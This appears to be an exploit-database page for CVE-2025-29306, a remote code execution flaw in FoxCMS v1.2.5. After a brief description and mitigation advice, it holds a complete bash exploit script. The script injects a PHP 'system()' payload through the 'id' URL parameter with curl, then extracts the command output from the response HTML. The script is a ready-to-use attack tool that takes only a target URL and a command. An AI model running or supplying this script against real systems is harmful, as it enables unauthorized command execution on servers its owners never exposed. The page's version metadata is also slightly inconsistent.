header-logo
Suggest Exploit
vendor:
FoxCMS
by:
VeryLazyTech
4.1
CVSS
MEDIUM
Remote Code Execution
94
CWE
Product Name: FoxCMS
Affected Version From: 1.2.2005
Affected Version To: 1.2.2005
Patch Exists: NO
Related CWE: CVE-2025-29306
CPE: a:foxcms_project:foxcms:1.2.5
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 22.04, Windows Server 2019
2025

Remote Code Execution in FoxCMS v.1.2.5

The exploit allows an attacker to execute remote code in FoxCMS v.1.2.5. By sending a specially crafted payload to the target, an attacker can run arbitrary commands on the system. This vulnerability is identified as CVE-2025-29306.

Mitigation:

To mitigate this vulnerability, it is recommended to update FoxCMS to a patched version that addresses this issue. Additionally, input validation and sanitization should be implemented to prevent malicious code execution.
Source

Exploit-DB raw data:

# Date: 2025-04-17
# Exploit Title: 
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com

#!/bin/bash

banner() {
cat <<'EOF'
  ______     _______   ____   ___ ____  ____    ____   ___ _____  ___   __   
 / ___\ \   / / ____| |___ \ / _ \___ \| ___|  |___ \ / _ \___ / / _ \ / /_  
| |    \ \ / /|  _|     __) | | | |__) |___ \    __) | (_) ||_ \| | | | '_ \ 
| |___  \ V / | |___   / __/| |_| / __/ ___) |  / __/ \__, |__) | |_| | (_) |
 \____|  \_/  |_____| |_____|\___/_____|____/  |_____|  /_/____/ \___/ \___/                                                                             

__     __                _                      _____         _     
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__  
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \ 
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/                       
                    

                    @VeryLazyTech - Medium
                    
EOF

}

# Call the banner function
banner

set -e

# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
    printf "Usage: $0 <url> <command>"
    exit 1
fi

TARGET=$1

# Encode payload
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"

echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")

# Extract <ul> from known XPath location using xmllint
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)

# Strip tags, clean up
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')

echo
echo "[+] Command Output:"
echo "$CLEANED"

Navigation

Suggest Exploit

Services By CQR